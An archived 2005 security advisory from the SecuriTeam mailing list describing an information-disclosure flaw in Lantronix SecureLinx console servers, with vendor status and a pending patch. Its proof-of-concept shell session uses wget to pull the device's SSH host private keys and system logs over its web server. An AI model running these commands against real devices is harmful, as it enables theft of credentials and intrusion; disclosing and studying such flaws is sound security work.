Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Exploits-HackingTools
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

[UNIX] Lantronix SecureLinx Console Server Information Disclosure

from [SecuriTeam] Network Security [Permanent Link]
Subject: [UNIX] Lantronix SecureLinx Console Server Information Disclosure
Date: 25 Jul 2005 19:15:53 +0200 
The following security advisory is sent to the securiteam mailing list, and can 
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html 

- - - - - - - - -



  Lantronix SecureLinx Console Server Information Disclosure
------------------------------------------------------------------------


SUMMARY

"The  
<http://www.lantronix.com/data-center-management/console-servers/securelinx-slc.html>
 SecureLinx SLC console manager provides secure, remote access to servers and 
IT infrastructure equipment, whether it s located down the hall or across the 
globe. "

A vulnerability discovered in Lantronix's SecureLinx allows retrieval of  
the server's ssh-private keys and system logfiles.

DETAILS

Vulnerable Systems:
 * All models of SLC series (SLC8, 16, 32, 48)
 * SLC32, Software version: 2.0, 3.0

Lantronix console servers come with a mini_httpd that doesn't validate the 
local host's UNIX ACLs. This allows remote attackers to retrieve the files 
located under the /etc/ssh directory. This renders the ssh-encryption 
close to useless. In addition attackers can read the log files located 
under /cifsshare/logs (Though the directory is named /cifsshare/logs/ it 
contains system logs, potentially also snifferlogs from serial console 
sessions).

Note that console servers provide an administrative console access to 
devices hooked up on their serial lines (up to 48).

Vendor Status:
Vendor Confirmation for SLC-Series, Firmware 2.0 (researched), 3.0 
(current)

Patch Availability:
Bugfix pending. Vendor is working on 3.1, to be released in August.

Proof of concept:
myprompt:~ # ssh slc
The authenticity of host 'slc (192.168.50.205)' can't be established.
RSA key fingerprint is d5:d8:93:33:db:b3:80:91:74:79:be:e7:ff:f6:c6:41.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added 'slc,192.168.50.205' (RSA) to the list of known 
hosts.

Welcome to the SLC

login: root
Password: Connection to slc closed.
myprompt:~ # tail -1 .ssh/known_hosts
slc,192.168.50.205 ssh-rsa 
AAAAB3NzaC1yc2EAAAABIwAAAIEA9FZwKSNlfAl72aWewoXE1e8g09
9yCSqVKGTRWSkOBKV8oqVgX8ryj/adwSLbwxSi8HyLd9AfiNmyyTJ4/ITX4JgpNCcw8k6SNK3HrletSs
7z4EGHiYcB25gIgX6fQrnjkm1AP3HXR0Wkeg7B5wFqwqKkNUd/aPhegLxjpufB0g0=
myprompt:~ # wget -q -O - https://slc/etc
<HTML><HEAD><TITLE>Index of etc/</TITLE></HEAD>
<BODY BGCOLOR="#99cc99"><H4>Index of etc/</H4>
<PRE>
-rw-------    1 root          672 Jan  1  1970 ssh_host_dsa_key
-rw-r--r--    1 root          601 Jan  1  1970 ssh_host_dsa_key.pub
-rw-------    1 root          526 Jan  1  1970 ssh_host_key
-rw-r--r--    1 root          330 Jan  1  1970 ssh_host_key.pub
-rw-------    1 root          883 Jan  1  1970 ssh_host_rsa_key
-rw-r--r--    1 root          221 Jan  1  1970 ssh_host_rsa_key.pub
</PRE>
<HR>
<ADDRESS><A 
HREF="http://www.acme.com/software/mini_httpd/";>mini_httpd/1.15c 02m
ay2001</A></ADDRESS>
</BODY></HTML>
myprompt:~ # wget -q -O - https://slc/etc/ssh_host_rsa_key.pub
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEA9FZwKSNlfAl72aWewoX
E1e8g099yCSqVKGTRWSkOBKV8oqVgX8ryj/adwSLbwxSi8HyLd9Af
iNmyyTJ4/ITX4JgpNCcw8k6SNK3HrletSs7z4EGHiYcB25gIgX6f
Qrnjkm1AP3HXR0Wkeg7B5wFqwqKkNUd/aPhegLxjpufB0g0= root@(none)
myprompt:~ # wget -q -O - https://slc/etc/ssh_host_rsa_key | grep -w KEY
-----BEGIN RSA PRIVATE KEY-----
-----END RSA PRIVATE KEY-----
myprompt:~ # wget -q -O - https://slc/etc/ssh_host_dsa_key | grep -w KEY
-----BEGIN DSA PRIVATE KEY-----
-----END DSA PRIVATE KEY-----
myprompt:~ # wget -O - -q https://slc/cifsshare/logs/
<HTML><HEAD><TITLE>Index of cifsshare/logs/</TITLE></HEAD>
<BODY BGCOLOR="#99cc99"><H4>Index of cifsshare/logs/</H4>
<PRE>
lrwxrwxrwx  Oct  21  2004 authentication  <A HREF="-> 
./../../var/log/secure">-> ../../../var/log/secure</A>
lrwxrwxrwx  Oct  21  2004 devports  <A HREF="-> 
./../../var/log/devports">-> ../../../var/log/devports</A>
lrwxrwxrwx  Oct  21  2004 diag  <A HREF="-> ../../../var/log/diag">-> 
./../../var/log/diag</A>
lrwxrwxrwx  Oct  21  2004 general  <A HREF="-> 
./../../var/log/general">-> ../../../var/log/general</A>
lrwxrwxrwx  Oct  21  2004 network  <A HREF="-> 
./../../var/log/network">-> ../../../var/log/network</A>
lrwxrwxrwx  Oct  21  2004 services  <A HREF="-> 
./../../var/log/services">-> ../../../var/log/services</A>
lrwxrwxrwx  Oct  21  2004 sw  <A HREF="-> ../../../var/log/sw">-> 
./../../var/log/sw</A>
</PRE>
<HR>
<ADDRESS><A 
HREF="http://www.acme.com/software/mini_httpd/";>mini_httpd/1.15c 
02may2001</A></ADDRESS>
</BODY></HTML>
myprompt:~ # for i in `lynx -dump -nolist https://slc/cifsshare/logs/ |awk 
'{ print $5 }'`; do echo ; echo ---$i---; wget -O - -q 
https://slc/cifsshare/logs/$i; done
..
..


ADDITIONAL INFORMATION

The information has been provided by Dr. Dirk Wetter.
The original article can be found at:  <http://drwetter.org/> 
http://drwetter.org/



======================================== 


This bulletin is sent to members of the SecuriTeam mailing list. 
To unsubscribe from the list, send mail with an empty subject line and body to: 
list-unsubscribe@securiteam.com 
In order to subscribe to the mailing list, simply forward this email to: 
list-subscribe@securiteam.com 


==================== 
==================== 

DISCLAIMER: 
The information in this bulletin is provided "AS IS" without warranty of any 
kind. 
In no event shall we be liable for any damages whatsoever including direct, 
indirect, incidental, consequential, loss of business profits or special 
damages.
[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • [UNIX] Lantronix SecureLinx Console Server Information Disclosure, SecuriTeam <=
Previous by Date:  [UNIX] Contrexx SQL Injection, Information Disclosure and Cross-Site Scripting, SecuriTeam
Next by Date:  [TOOL] DumpHex - Convert a File to Hex Dump, SecuriTeam
Previous by Thread:  [UNIX] Contrexx SQL Injection, Information Disclosure and Cross-Site Scripting, SecuriTeam
Next by Thread:  [TOOL] DumpHex - Convert a File to Hex Dump, SecuriTeam
Indexes:  [Date] [Thread] [Top] [All Lists]